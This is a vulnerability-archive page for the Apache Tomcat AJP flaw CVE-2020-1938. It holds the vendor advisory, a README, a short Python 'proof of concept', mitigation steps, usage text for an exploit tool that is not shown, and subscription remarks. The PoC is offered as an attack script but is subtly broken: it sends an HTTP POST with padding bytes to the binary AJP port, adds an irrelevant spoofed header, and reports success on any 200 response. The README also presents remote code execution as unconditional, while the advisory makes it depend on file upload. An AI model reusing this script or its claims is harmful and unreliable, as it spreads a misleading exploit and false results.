Associated Vulnerability
Title:Apache Tomcat 安全漏洞 (CVE-2020-1938)Description:When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
Description
poc-CVE-2020-1938
Readme
# About
CVE-2020-1938 is a critical vulnerability affecting the Apache Tomcat server that allows remote code execution (RCE). It specifically concerns the AJP (Apache JServ Protocol) connector, which is often enabled by default. This vulnerability arises from the improper handling of requests, allowing an attacker to exploit the AJP interface to read arbitrary files on the server or even execute commands.
## Understanding CVE-2020-1938
- **Description**: The vulnerability exists in the way Tomcat processes AJP requests. An attacker can craft a malicious request that exploits this vulnerability, potentially leading to unauthorized access to sensitive information or execution of arbitrary code. The flaw is primarily tied to Tomcat configurations where the AJP connector is exposed to the internet without adequate protections.
- **Affected Versions**: This vulnerability affects multiple versions of Apache Tomcat, specifically those where the AJP connector is enabled. Users of Tomcat 7.x, 8.x, and 9.x need to be particularly vigilant.
- **Impact**: Successful exploitation can lead to severe security breaches, including unauthorized file access, data leaks, and remote code execution. As a result, it is critical for organizations to take proactive measures to mitigate this risk.
## Proof of Concept (PoC) for CVE-2020-1938
A proof of concept (PoC) is typically a demonstration of the vulnerability in action, allowing security professionals to test whether their systems are vulnerable. Here's how you can use a PoC for CVE-2020-1938.
### Prerequisites
1. **Environment Setup**:
- A vulnerable instance of Apache Tomcat (preferably version 7.x, 8.x, or 9.x with the AJP connector enabled).
- Access to a system where you can run Python scripts or any other script language that can make HTTP requests.
2. **Networking**: Ensure that the AJP port (default 8009) is accessible from the machine running the PoC.
### Example PoC Script
Below is a simplified Python script that demonstrates how an attacker could exploit CVE-2020-1938.
```python
import requests
# Target information
target_ip = "http://<TARGET_IP>:<AJP_PORT>"
payload = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + b"/path/to/file" + b'\x00'
# Crafting the exploit
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"X-Forwarded-For": "127.0.0.1",
"User-Agent": "Mozilla/5.0"
}
# Sending the request
try:
response = requests.post(target_ip, data=payload, headers=headers, timeout=5)
if response.status_code == 200:
print("Exploit successful, response:")
print(response.text)
else:
print("Exploit failed, status code:", response.status_code)
except Exception as e:
print("An error occurred:", str(e))
```
## Mitigation Strategies
1. **Configuration Changes**: Disable the AJP connector if it is not needed. If it is required, restrict access using firewall rules.
2. **Upgrade Tomcat**: Ensure you are using a version of Tomcat that is not vulnerable to CVE-2020-1938. Always apply security updates promptly.
3. **Monitoring and Logging**: Implement monitoring solutions to track unusual activity on your Tomcat servers. Log all access to the AJP connector for later analysis.
4. **Network Security**: Use network segmentation to ensure that only trusted networks can access your application servers, particularly those using AJP.
# Usage
```
usage: CVE-2020-1938.py [-h] [-p PORT] [-f FILE] target
positional arguments:
target Hostname or IP to attack
options:
-h, --help show this help message and exit
-p PORT, --port PORT AJP port to attack (default is 8009)
-f FILE, --file FILE file path on the server(default is WEB-INF/web.xml)
```
File Snapshot
[4.0K] /data/pocs/17132e0c1ef55947d73835a53b99212d7ac60a17
├── [ 16K] cve-2020-1938.py
└── [3.7K] README.md
0 directories, 2 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →